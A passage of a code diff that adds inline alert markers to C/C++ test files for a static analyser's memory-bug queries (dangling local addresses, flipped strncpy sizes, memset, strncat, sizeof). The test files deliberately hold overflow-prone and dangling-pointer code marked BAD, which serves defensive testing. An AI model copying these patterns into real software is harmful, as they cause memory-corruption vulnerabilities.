s101.p = p3; // $ Alert return x; } @@ -86,7 +86,7 @@ void test106() { S100 s; // BAD: local address is written to a static variable, which could // be unsafe. - s106.p = &(s.i); + s106.p = &(s.i); // $ Alert } // Test for reference types. @@ -97,7 +97,7 @@ int test107() { r1++; // BAD: local address is written to a static variable, which could // be unsafe. - s101.p = &r1; + s101.p = &r1; // $ Alert return r1; } @@ -124,7 +124,7 @@ int test201() { int x = 0; // BAD: local address is written to a static variable, which could // be unsafe. - s201.p = &x; + s201.p = &x; // $ Alert return x; } @@ -133,7 +133,7 @@ int test202() { static struct S200 s202; // BAD: local address is written to a local static variable, which could // be unsafe. - s202.p = &x; + s202.p = &x; // $ Alert return x; } @@ -142,7 +142,7 @@ static const int* xptr; void example1() { int x = 0; - xptr = &x; // BAD: address of local variable stored in non-local memory. + xptr = &x; // BAD: address of local variable stored in non-local memory. // $ Alert } void example2() { @@ -166,27 +166,27 @@ void test301() { int b2[14][15]; int b3[13][14][15]; - s.p1 = b1; // BAD: address of local variable stored in non-local memory. - s.p1 = &b1[1]; // BAD: address of local variable stored in non-local memory. - - s.p2 = b2; // BAD: address of local variable stored in non-local memory. - s.p2 = &b2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = b2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = &b2[1][2]; // BAD: address of local variable stored in non-local memory. - - s.p3 = b3; // BAD: address of local variable stored in non-local memory. - s.p3 = &b3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = b3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = &b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. - - s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.p1 = b1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &b1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + + s.p2 = b2; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &b2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + + s.p3 = b3; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p3 = &b3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = b3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert + + s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } void test302() { @@ -212,41 +212,41 @@ void test302() { // Even though s is local, we don't know that s.pp is local because // there is a pointer indirection involved. - s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.pp[0] = b1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = b3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &b3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } void test303() { static S300 s; S300 x; - s.p1 = x.a1; // BAD: address of local variable stored in non-local memory. - s.p1 = &x.a1[1]; // BAD: address of local variable stored in non-local memory. + s.p1 = x.a1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &x.a1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert - s.p2 = x.a2; // BAD: address of local variable stored in non-local memory. - s.p2 = &x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.p1 = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. + s.p2 = x.a2; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert - s.p3 = x.a3; // BAD: address of local variable stored in non-local memory. - s.p3 = &x.a3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = x.a3[1]; // BAD: address of local variable stored in non-local memory. - s.p2 = &x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.p1 = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.p3 = x.a3; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p3 = &x.a3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = x.a3[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p2 = &x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.p1 = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert // Even though s is local, we don't know that s.pp is local because // there is a pointer indirection involved. - s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } void test304() { @@ -270,12 +270,12 @@ void test304() { // Even though s is local, we don't know that s.pp is local because // there is a pointer indirection involved. - s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. - s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. + s.pp[0] = x.a1; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a1[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a2[1]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a2[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = x.a3[1][2]; // BAD: address of local variable stored in non-local memory. // $ Alert + s.pp[0] = &x.a3[1][2][3]; // BAD: address of local variable stored in non-local memory. // $ Alert } struct S400 { @@ -309,11 +309,11 @@ int test400() { s.p0 = &x; // GOOD: s.p0 is on the stack. s.p1[1] = &x; // GOOD: s.p1 is on the stack. s.p2[1][2] = &x; // GOOD: s.p1 is on the stack. - s.q1[1] = &x; // BAD: pointer indirection to the heap. - s.q2[1][2] = &x; // BAD: pointer indirection to the heap. - s.q3[1][2][3] = &x; // BAD: pointer indirection to the heap. - s.r2[1][2] = &x; // BAD: pointer indirection to the heap. - s.r3[1][2][3] = &x; // BAD: pointer indirection to the heap. + s.q1[1] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.q2[1][2] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.q3[1][2][3] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.r2[1][2] = &x; // BAD: pointer indirection to the heap. // $ Alert + s.r3[1][2][3] = &x; // BAD: pointer indirection to the heap. // $ Alert return x; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref index bf0bf1ea7d05..3a2ef158d3d6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/StrncpyFlippedArgs.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/StrncpyFlippedArgs.ql \ No newline at end of file +query: Likely Bugs/Memory Management/StrncpyFlippedArgs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c index 2ed60b96315e..bba5318fc328 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.c @@ -19,7 +19,7 @@ void good0(char *arg) { void bad0(char *arg) { char buf[80]; // BAD: Checks size of source - strncpy(buf, arg, strlen(arg)); + strncpy(buf, arg, strlen(arg)); // $ Alert } @@ -30,6 +30,6 @@ void good1(const char *buf, char *arg) { void bad1(const char *buf, char *arg) { // BAD: Checks size of source - strncpy(buf, arg, strlen(arg)); + strncpy(buf, arg, strlen(arg)); // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp index ad2e39b748e2..89fcbc432edc 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/StrncpyFlippedArgs/test.cpp @@ -18,9 +18,9 @@ void test1() const char *str = "01234567890123456789"; strncpy(buf1, str, sizeof(buf1)); - strncpy(buf1, str, strlen(str)); // BAD - strncpy(buf1, str, strlen(str) + 1); // BAD - strncpy(buf1, buf2, sizeof(buf2)); // BAD + strncpy(buf1, str, strlen(str)); // BAD // $ Alert + strncpy(buf1, str, strlen(str) + 1); // BAD // $ Alert + strncpy(buf1, buf2, sizeof(buf2)); // BAD // $ Alert } void test2() @@ -29,12 +29,12 @@ void test2() wchar_t buf2[20]; const wchar_t *str = L"01234567890123456789"; - wcsncpy(buf1, str, sizeof(buf1)); // (bad, but not a strncpyflippedargs bug) + wcsncpy(buf1, str, sizeof(buf1)); // (bad, but not a strncpyflippedargs bug) // $ Alert wcsncpy(buf1, str, sizeof(buf1) / sizeof(wchar_t)); - wcsncpy(buf1, str, wcslen(str)); // BAD - wcsncpy(buf1, str, wcslen(str) + 1); // BAD - wcsncpy(buf1, buf2, sizeof(buf2)); // BAD - wcsncpy(buf1, buf2, sizeof(buf2) / sizeof(wchar_t)); // BAD [NOT DETECTED] + wcsncpy(buf1, str, wcslen(str)); // BAD // $ Alert + wcsncpy(buf1, str, wcslen(str) + 1); // BAD // $ Alert + wcsncpy(buf1, buf2, sizeof(buf2)); // BAD // $ Alert + wcsncpy(buf1, buf2, sizeof(buf2) / sizeof(wchar_t)); // BAD [NOT DETECTED] // $ Alert } void test3() @@ -44,9 +44,9 @@ void test3() const char *str = "01234567890123456789"; strcpy_s(buf1, sizeof(buf1), str); - strcpy_s(buf1, strlen(str), str); // BAD - strcpy_s(buf1, strlen(str) + 1, str); // BAD - strcpy_s(buf1, sizeof(buf2), buf2); // BAD + strcpy_s(buf1, strlen(str), str); // BAD // $ Alert + strcpy_s(buf1, strlen(str) + 1, str); // BAD // $ Alert + strcpy_s(buf1, sizeof(buf2), buf2); // BAD // $ Alert } struct S { @@ -59,10 +59,10 @@ void test4(S *a, S *b) { strncpy(a->x, b->x, sizeof(a->x)); // GOOD strncpy(a->x, b->x, sizeof(b->x)); // GOOD (sizes match, so it's ok) - strncpy(a->x, b->z, sizeof(b->z)); // BAD + strncpy(a->x, b->z, sizeof(b->z)); // BAD // $ Alert strncpy(a->y, b->y, strlen(a->y) + 1); // GOOD - strncpy(a->y, b->y, strlen(b->y) + 1); // BAD + strncpy(a->y, b->y, strlen(b->y) + 1); // BAD // $ Alert } void test5(char *buf) @@ -78,10 +78,10 @@ void test6(T *a, T *b) { strncpy(a->s->x, b->s->x, sizeof(a->s->x)); // GOOD strncpy(a->s->x, b->s->x, sizeof(b->s->x)); // GOOD (sizes match, so it's ok) - strncpy(a->s->x, b->s->x, sizeof(b->s->z)); // BAD + strncpy(a->s->x, b->s->x, sizeof(b->s->z)); // BAD // $ Alert strncpy(a->s->y, b->s->y, strlen(a->s->y) + 1); // GOOD - strncpy(a->s->y, b->s->y, strlen(b->s->y) + 1); // BAD + strncpy(a->s->y, b->s->y, strlen(b->s->y) + 1); // BAD // $ Alert } void test7(char* x, char* y) { @@ -102,10 +102,10 @@ void test9() wchar_t buf2[20]; const wchar_t *str = L"01234567890123456789"; - wcsxfrm_l(buf1, str, sizeof(buf1), nullptr); // BAD (but not a StrncpyFlippedArgs bug) + wcsxfrm_l(buf1, str, sizeof(buf1), nullptr); // BAD (but not a StrncpyFlippedArgs bug) // $ Alert wcsxfrm_l(buf1, str, sizeof(buf1) / sizeof(wchar_t), nullptr); // GOOD - wcsxfrm_l(buf1, str, wcslen(str), nullptr); // BAD - wcsxfrm_l(buf1, str, wcslen(str) + 1, nullptr); // BAD - wcsxfrm_l(buf1, buf2, sizeof(buf2), nullptr); // BAD - wcsxfrm_l(buf1, buf2, sizeof(buf2) / sizeof(wchar_t), nullptr); // BAD + wcsxfrm_l(buf1, str, wcslen(str), nullptr); // BAD // $ Alert + wcsxfrm_l(buf1, str, wcslen(str) + 1, nullptr); // BAD // $ Alert + wcsxfrm_l(buf1, buf2, sizeof(buf2), nullptr); // BAD // $ Alert + wcsxfrm_l(buf1, buf2, sizeof(buf2) / sizeof(wchar_t), nullptr); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref index ab987b824e42..8a03a49d34e3 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/SuspiciousCallToMemset.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/SuspiciousCallToMemset.ql \ No newline at end of file +query: Likely Bugs/Memory Management/SuspiciousCallToMemset.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c index 1acf9e8e566b..f13ea2624034 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/doc_tests.c @@ -26,7 +26,7 @@ void tests() struct T *t2 = (struct T*)malloc(sizeof(struct T)); // the size of the struct is probably intended // but this takes the size of a pointer - memset(t2, 0, sizeof(t2)); // BAD + memset(t2, 0, sizeof(t2)); // BAD // $ Alert // correct but discouraged, use sizeof(struct T) instead memset(t1, 0, sizeof(*t2)); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp index 6a8c8f904a79..a764eb799bb9 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToMemset/test.cpp @@ -23,37 +23,37 @@ int main() memset(&ms, 0, sizeof(myStruct)); // GOOD memset(&ms, 0, sizeof(ms)); // GOOD memset(&ms, 0, 8); // BAD [NOT DETECTED] - memset(&ms, 0, sizeof(otherStruct)); // BAD + memset(&ms, 0, sizeof(otherStruct)); // BAD // $ Alert { myStruct *msPtr = &ms; void *vPtr = msPtr; - memset(&msPtr, 0, sizeof(myStruct)); // BAD + memset(&msPtr, 0, sizeof(myStruct)); // BAD // $ Alert memset(&msPtr, 0, sizeof(myStruct *)); // GOOD - memset(&msPtr, 0, sizeof(*msPtr)); // BAD + memset(&msPtr, 0, sizeof(*msPtr)); // BAD // $ Alert memset(&msPtr, 0, sizeof(msPtr)); // GOOD memset(msPtr, 0, sizeof(myStruct)); // GOOD - memset(msPtr, 0, sizeof(myStruct *)); // BAD + memset(msPtr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(msPtr, 0, sizeof(*msPtr)); // GOOD - memset(msPtr, 0, sizeof(msPtr)); // BAD + memset(msPtr, 0, sizeof(msPtr)); // BAD // $ Alert memset(vPtr, 0, sizeof(myStruct)); // GOOD - memset(vPtr, 0, sizeof(myStruct *)); // BAD + memset(vPtr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(vPtr, 0, sizeof(*msPtr)); // GOOD - memset(vPtr, 0, sizeof(msPtr)); // BAD + memset(vPtr, 0, sizeof(msPtr)); // BAD // $ Alert { myStruct **msPtrPtr = &msPtr; - memset(&msPtrPtr, 0, sizeof(myStruct)); // BAD - memset(&msPtrPtr, 0, sizeof(myStruct *)); // BAD + memset(&msPtrPtr, 0, sizeof(myStruct)); // BAD // $ Alert + memset(&msPtrPtr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(&msPtrPtr, 0, sizeof(myStruct **)); // GOOD - memset(msPtrPtr, 0, sizeof(myStruct)); // BAD + memset(msPtrPtr, 0, sizeof(myStruct)); // BAD // $ Alert memset(msPtrPtr, 0, sizeof(myStruct *)); // GOOD - memset(msPtrPtr, 0, sizeof(myStruct **)); // BAD + memset(msPtrPtr, 0, sizeof(myStruct **)); // BAD // $ Alert memset(*msPtrPtr, 0, sizeof(myStruct)); // GOOD - memset(*msPtrPtr, 0, sizeof(myStruct *)); // BAD - memset(*msPtrPtr, 0, sizeof(myStruct **)); // BAD + memset(*msPtrPtr, 0, sizeof(myStruct *)); // BAD // $ Alert + memset(*msPtrPtr, 0, sizeof(myStruct **)); // BAD // $ Alert } } } @@ -65,40 +65,40 @@ int main() memset(&msArr, 0, sizeof(myStruct) * NUM); // GOOD memset(&msArr, 0, sizeof(msArr)); // GOOD memset(&msArr, 0, sizeof(myStruct[NUM])); // GOOD - memset(&msArr, 0, sizeof(myStruct *)); // BAD + memset(&msArr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(msArr, 0, sizeof(myStruct) * NUM); // GOOD memset(msArr, 0, sizeof(msArr)); // GOOD memset(msArr, 0, sizeof(myStruct[NUM])); // GOOD - memset(msArr, 0, sizeof(myStruct *)); // BAD + memset(msArr, 0, sizeof(myStruct *)); // BAD // $ Alert memset(&(msArr[0]), 0, sizeof(myStruct) * NUM); // GOOD memset(&(msArr[0]), 0, sizeof(msArr)); // GOOD memset(&(msArr[0]), 0, sizeof(myStruct[NUM])); // GOOD - memset(&(msArr[0]), 0, sizeof(myStruct *)); // BAD + memset(&(msArr[0]), 0, sizeof(myStruct *)); // BAD // $ Alert memset(msPtr, 0, sizeof(myStruct) * NUM); // GOOD memset(msPtr, 0, sizeof(msArr)); // GOOD memset(msPtr, 0, sizeof(myStruct[NUM])); // GOOD - memset(msPtr, 0, sizeof(myStruct *)); // BAD + memset(msPtr, 0, sizeof(myStruct *)); // BAD // $ Alert } { myStructPtr msPtrArr[NUM]; - memset(&msPtrArr, 0, sizeof(myStruct) * NUM); // BAD + memset(&msPtrArr, 0, sizeof(myStruct) * NUM); // BAD // $ Alert memset(&msPtrArr, 0, sizeof(myStruct *) * NUM); // GOOD memset(&msPtrArr, 0, sizeof(myStructPtr) * NUM); // GOOD - memset(&msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD + memset(&msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD // $ Alert memset(msPtrArr, 0, sizeof(myStruct) * NUM); // BAD [NOT DETECTED] memset(msPtrArr, 0, sizeof(myStruct *) * NUM); // GOOD memset(msPtrArr, 0, sizeof(myStructPtr) * NUM); // GOOD - memset(msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD - memset(&(msPtrArr[0]), 0, sizeof(myStruct) * NUM); // BAD + memset(msPtrArr, 0, sizeof(myStruct **) * NUM); // BAD // $ Alert + memset(&(msPtrArr[0]), 0, sizeof(myStruct) * NUM); // BAD // $ Alert memset(&(msPtrArr[0]), 0, sizeof(myStruct *) * NUM); // GOOD memset(&(msPtrArr[0]), 0, sizeof(myStructPtr) * NUM); // GOOD - memset(&(msPtrArr[0]), 0, sizeof(myStruct **) * NUM); // BAD + memset(&(msPtrArr[0]), 0, sizeof(myStruct **) * NUM); // BAD // $ Alert memset(msPtrArr[0], 0, sizeof(myStruct) * NUM); // GOOD - memset(msPtrArr[0], 0, sizeof(myStruct *) * NUM); // BAD - memset(msPtrArr[0], 0, sizeof(myStructPtr) * NUM); // BAD - memset(msPtrArr[0], 0, sizeof(myStruct **) * NUM); // BAD + memset(msPtrArr[0], 0, sizeof(myStruct *) * NUM); // BAD // $ Alert + memset(msPtrArr[0], 0, sizeof(myStructPtr) * NUM); // BAD // $ Alert + memset(msPtrArr[0], 0, sizeof(myStruct **) * NUM); // BAD // $ Alert } { @@ -126,13 +126,13 @@ void myFunc(myStruct paramArray[80], myStruct &refStruct) memset(&localArray, 0, sizeof(localArray)); // GOOD memset(paramArray, 0, sizeof(myStruct) * 80); // GOOD - memset(paramArray, 0, sizeof(paramArray)); // GOOD [FALSE POSITIVE] - memset(¶mArray, 0, sizeof(myStruct) * 80); // BAD + memset(paramArray, 0, sizeof(paramArray)); // GOOD [FALSE POSITIVE] // $ Alert + memset(¶mArray, 0, sizeof(myStruct) * 80); // BAD // $ Alert memset(¶mArray, 0, sizeof(paramArray)); // BAD [NOT DETECTED] memset(&refStruct, 0, sizeof(myStruct)); // GOOD memset(&refStruct, 0, sizeof(refStruct)); // GOOD - memset(&refStruct, 0, sizeof(myStruct *)); // BAD + memset(&refStruct, 0, sizeof(myStruct *)); // BAD // $ Alert } class MyClass @@ -167,9 +167,9 @@ void more_tests_2() intArrayPointer iapa[88]; memset(iap, 0, sizeof(intArray)); // GOOD - memset(&iap, 0, sizeof(intArray)); // BAD + memset(&iap, 0, sizeof(intArray)); // BAD // $ Alert memset(iapa, 0, sizeof(iapa)); // GOOD - memset(iapa, 0, sizeof(intArrayPointer *)); // BAD + memset(iapa, 0, sizeof(intArrayPointer *)); // BAD // $ Alert } void more_tests_3() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref index 37583da5e482..ed09b7cd912d 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/SuspiciousCallToStrncat.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/SuspiciousCallToStrncat.ql +query: Likely Bugs/Memory Management/SuspiciousCallToStrncat.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c index 13c18b75dbb4..0ea05c6bf183 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousCallToStrncat/test.c @@ -21,7 +21,7 @@ void good0(char *s) { void bad0(char *s) { char buf[80]; strcpy(buf, "s = "); - strncat(buf, s, sizeof(buf)); // BAD -- Forgot to allow for "s = " + strncat(buf, s, sizeof(buf)); // BAD -- Forgot to allow for "s = " // $ Alert strncat(buf, ".", 1); // BAD [NOT DETECTED] -- there might not be even 1 character of space } @@ -42,7 +42,7 @@ void bad1(char *s) { void strncat_test1(char *s) { char buf[80]; strncat(buf, s, sizeof(buf) - strlen(buf) - 1); // GOOD - strncat(buf, s, sizeof(buf) - strlen(buf)); // BAD + strncat(buf, s, sizeof(buf) - strlen(buf)); // BAD // $ Alert } void* malloc(size_t); @@ -64,7 +64,7 @@ void strncat_test3(char* s, struct buffers* buffers) { unsigned len_array = strlen(buffers->array); unsigned max_size = sizeof(buffers->array); unsigned free_size = max_size - len_array; - strncat(buffers->array, s, free_size); // BAD + strncat(buffers->array, s, free_size); // BAD // $ Alert } #define MAX_SIZE 80 @@ -72,8 +72,8 @@ void strncat_test3(char* s, struct buffers* buffers) { void strncat_test4(char *s) { char buf[MAX_SIZE]; strncat(buf, s, MAX_SIZE - strlen(buf) - 1); // GOOD - strncat(buf, s, MAX_SIZE - strlen(buf)); // BAD - strncat(buf, "...", MAX_SIZE - strlen(buf)); // BAD + strncat(buf, s, MAX_SIZE - strlen(buf)); // BAD // $ Alert + strncat(buf, "...", MAX_SIZE - strlen(buf)); // BAD // $ Alert } void strncat_test5(char *s) { @@ -88,7 +88,7 @@ void strncat_test6() { char dest[60]; dest[0] = '\0'; // Will write `dest[0 .. 5]` - strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] + strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] // $ Alert } { @@ -96,6 +96,6 @@ void strncat_test6() { memset(dest, 'a', sizeof(dest)); dest[54] = '\0'; // Will write `dest[54 .. 59]` - strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] + strncat(dest, "small", sizeof(dest)); // GOOD [FALSE POSITIVE] // $ Alert } } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref index b31c76e45832..846e202a48ad 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/SuspiciousSizeof.qlref @@ -1 +1,2 @@ -Likely Bugs/Memory Management/SuspiciousSizeof.ql \ No newline at end of file +query: Likely Bugs/Memory Management/SuspiciousSizeof.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp index f782badb55ac..82da4edd17e4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/SuspiciousSizeof/test.cpp @@ -3,21 +3,21 @@ typedef unsigned int size_t; void *memcpy(void *destination, const void *source, size_t num); void f1(char s[]) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert // s is now a char*, not an array. // sizeof(s) will evaluate to sizeof(char *) int size2 = sizeof(s[0]); // GOOD } void f2(char s[10]) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert int size2 = sizeof(s[0]); // GOOD } typedef char myarray[10]; void f3(myarray s) { - int size = sizeof(s); // BAD + int size = sizeof(s); // BAD // $ Alert int size2 = sizeof(s[0]); // GOOD } @@ -28,7 +28,7 @@ struct container }; void f4(container *s) { - int size = sizeof(s); // (dubious) + int size = sizeof(s); // (dubious) // $ Alert int size3 = sizeof(s->ptr); // GOOD int size2 = sizeof(s->array); // GOOD } @@ -42,7 +42,7 @@ void f5(container *s) { void 